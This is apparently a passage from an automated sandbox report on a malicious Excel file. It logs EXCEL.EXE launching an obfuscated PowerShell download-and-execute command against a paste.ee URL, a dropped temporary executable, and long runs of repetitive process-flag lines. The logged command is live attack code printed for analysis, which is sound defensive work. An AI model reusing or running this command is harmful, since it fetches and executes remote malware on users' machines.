              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command IEX (new`-OB`jeCT('Net.WebClient')).'DoWnloAdsTrInG'('ht'+'tp://paste.ee/r/r87uc')
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command IEX (new`-OB`jeCT('Net.WebClient')).'DoWnloAdsTrInG'('ht'+'tp://paste.ee/r/r87uc')Jump to behavior
              Suspicious powershell command line foundShow sources
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command IEX (new`-OB`jeCT('Net.WebClient')).'DoWnloAdsTrInG'('ht'+'tp://paste.ee/r/r87uc')
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command IEX (new`-OB`jeCT('Net.WebClient')).'DoWnloAdsTrInG'('ht'+'tp://paste.ee/r/r87uc')Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_03192700 push eax; iretd 2_2_03192701
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_03192440 pushad ; retf 2_2_03192441
              Source: C:\Users\user\AppData\Local\Temp\qMBRkI.exeCode function: 18_2_00E388B6 push cs; iretd 18_2_00E388BA
              Source: C:\Users\user\AppData\Local\Temp\qMBRkI.exeCode function: 18_2_00E4B47C push eax; ret 18_2_00E4B482
              Source: C:\Users\user\AppData\Local\Temp\qMBRkI.exeCode function: 18_2_00E4B412 push eax; ret 18_2_00E4B418
              Source: C:\Users\user\AppData\Local\Temp\qMBRkI.exeCode function: 18_2_00E44F0C push es; iretd 18_2_00E44F0D
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_0311D0D1 push ecx; ret 21_2_0311D0E4
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_005388B6 push cs; iretd 21_2_005388BA
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_0054B3C5 push eax; ret 21_2_0054B418
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_0054B47C push eax; ret 21_2_0054B482
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_0054B412 push eax; ret 21_2_0054B418
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_0054B41B push eax; ret 21_2_0054B482
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_00544F0C push es; iretd 21_2_00544F0D
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_0054C7FC push dword ptr [2E339416h]; ret 21_2_0054C8C6
              Source: initial sampleStatic PE information: section name: .text entropy: 7.31104426813
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\qMBRkI.exeJump to dropped file
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
